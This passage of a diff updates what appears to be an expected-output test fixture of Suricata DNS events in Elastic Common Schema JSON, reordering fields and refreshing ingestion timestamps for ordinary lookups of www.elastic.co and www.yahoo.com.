"tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:48.839Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -302,27 +311,6 @@ "type": "query", "id": "60273" }, - "source": { - "port": 50720, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:48.839Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -337,8 +325,13 @@ "flow_id": "40074894954311" } }, + "source": { + "port": 50720, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597902800Z", + "ingested": "2021-12-14T14:55:20.366676101Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.839495+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":50720,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":60273,\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -348,9 +341,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:48.839Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -366,27 +375,6 @@ "type": "query", "id": "4210" }, - "source": { - "port": 41979, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:48.839Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -401,8 +389,13 @@ "flow_id": "2130691028471842" } }, + "source": { + "port": 41979, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597914700Z", + "ingested": "2021-12-14T14:55:20.366676457Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.839714+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":41979,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":4210,\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -412,9 +405,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:48.901Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 50720, "address": "10.0.2.15" @@ -473,28 +483,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:48.901Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -509,8 +497,13 @@ "flow_id": "40074894954311" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597919500Z", + "ingested": "2021-12-14T14:55:20.366676820Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.901548+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":50720,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":60273,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":270,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"}],\"grouped\":{\"A\":[\"175.16.199.1\",\"175.16.199.1\",\"175.16.199.1\",\"175.16.199.1\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", "category": [ "network" @@ -520,9 +513,28 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:48.902Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a04:4e42:0200:0000:0000:0000:0000:0729", + "2a04:4e42:0400:0000:0000:0000:0000:0729", + "10.0.2.3" + ] + }, "destination": { "port": 41979, "address": "10.0.2.15" 
@@ -581,30 +593,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:48.902Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "2a04:4e42:0200:0000:0000:0000:0000:0729", - "2a04:4e42:0400:0000:0000:0000:0000:0729", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -619,8 +607,13 @@ "flow_id": "2130691028471842" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597924700Z", + "ingested": "2021-12-14T14:55:20.366677201Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.902685+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":41979,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":4210,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":299,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"}],\"grouped\":{\"AAAA\":[\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"2a04:4e42:0200:0000:0000:0000:0000:0729\",\"2a04:4e42:0400:0000:0000:0000:0000:0729\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", "category": [ "network" 
@@ -630,9 +623,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.812Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -648,27 +657,6 @@ "type": "query", "id": "28329" }, - "source": { - "port": 44773, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.812Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -683,8 +671,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 44773, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597931Z", + "ingested": "2021-12-14T14:55:20.366677546Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.812655+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":44773,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28329,\"rrname\":\"www.yahoo.com\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -694,9 +687,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.812Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" 
@@ -712,27 +721,6 @@ "type": "query", "id": "7050" }, - "source": { - "port": 55246, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.812Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -747,8 +735,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 55246, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597936600Z", + "ingested": "2021-12-14T14:55:20.366677933Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.812828+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":55246,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":7050,\"rrname\":\"www.yahoo.com\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -758,9 +751,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.846Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.3" + ] + }, "destination": { "port": 44773, "address": "10.0.2.15" @@ -787,27 +796,6 @@ }, "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.846Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -824,8 +812,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597942100Z", + "ingested": "2021-12-14T14:55:20.366678308Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.yahoo.com\",\"rrtype\":\"CNAME\",\"ttl\":1315,\"rdata\":\"atsv2-fp-shed.wg1.b.yahoo.com\"}}", "category": [ "network" @@ -835,9 +828,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.846Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 44773, "address": "10.0.2.15" @@ -867,28 +877,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.846Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -905,8 +893,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597947500Z", + "ingested": "2021-12-14T14:55:20.366678822Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -916,42 +909,6 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" - } - }, - { - "destination": { - "port": 44773, - "address": "10.0.2.15" - }, - "dns": { - "response_code": "NOERROR", - "resolved_ip": [ - "175.16.199.1" - ], - "question": { - "top_level_domain": "com", - "subdomain": "atsv2-fp-shed.wg1.b", - "registered_domain": "yahoo.com" - }, - "answers": [ - { - "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "175.16.199.1", - "type": "A", - "ttl": 15 - } - ], - "id": "28329", - "header_flags": [ - "RD", - "RA" - ], - "type": "answer" - }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" }, "tags": [ "preserve_original_event" @@ -959,7 +916,9 @@ "network": { "protocol": "dns", "transport": "udp" - }, + } + }, + { "@timestamp": "2019-08-23T01:22:31.846Z", "ecs": { "version": "1.12.0" 
@@ -970,6 +929,35 @@ "10.0.2.3" ] }, + "destination": { + "port": 44773, + "address": "10.0.2.15" + }, + "dns": { + "response_code": "NOERROR", + "resolved_ip": [ + "175.16.199.1" + ], + "question": { + "top_level_domain": "com", + "subdomain": "atsv2-fp-shed.wg1.b", + "registered_domain": "yahoo.com" + }, + "answers": [ + { + "name": "atsv2-fp-shed.wg1.b.yahoo.com", + "data": "175.16.199.1", + "type": "A", + "ttl": 15 + } + ], + "id": "28329", + "header_flags": [ + "RD", + "RA" + ], + "type": "answer" + }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -986,8 +974,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597953900Z", + "ingested": "2021-12-14T14:55:20.366679169Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -997,9 +990,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.846Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 44773, "address": "10.0.2.15" 
@@ -1029,28 +1039,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.846Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1067,8 +1055,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597958900Z", + "ingested": "2021-12-14T14:55:20.366679520Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -1078,9 +1071,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.846Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 44773, "address": "10.0.2.15" @@ -1110,28 +1120,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.846Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -1148,8 +1136,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597964700Z", + "ingested": "2021-12-14T14:55:20.366679867Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -1159,9 +1152,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1188,27 +1197,6 @@ }, "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -1225,8 +1213,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597969800Z", + "ingested": "2021-12-14T14:55:20.366680219Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.yahoo.com\",\"rrtype\":\"CNAME\",\"ttl\":1268,\"rdata\":\"atsv2-fp-shed.wg1.b.yahoo.com\"}}", "category": [ "network" @@ -1236,9 +1229,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1268,28 +1278,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -1306,8 +1294,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597975700Z", + "ingested": "2021-12-14T14:55:20.366680695Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" @@ -1317,9 +1310,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1349,28 +1359,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -1387,8 +1375,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597980400Z", + "ingested": "2021-12-14T14:55:20.366681050Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" @@ -1398,9 +1391,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1430,28 +1440,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -1468,8 +1456,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597986200Z", + "ingested": "2021-12-14T14:55:20.366681406Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" @@ -1479,9 +1472,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1511,28 +1521,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
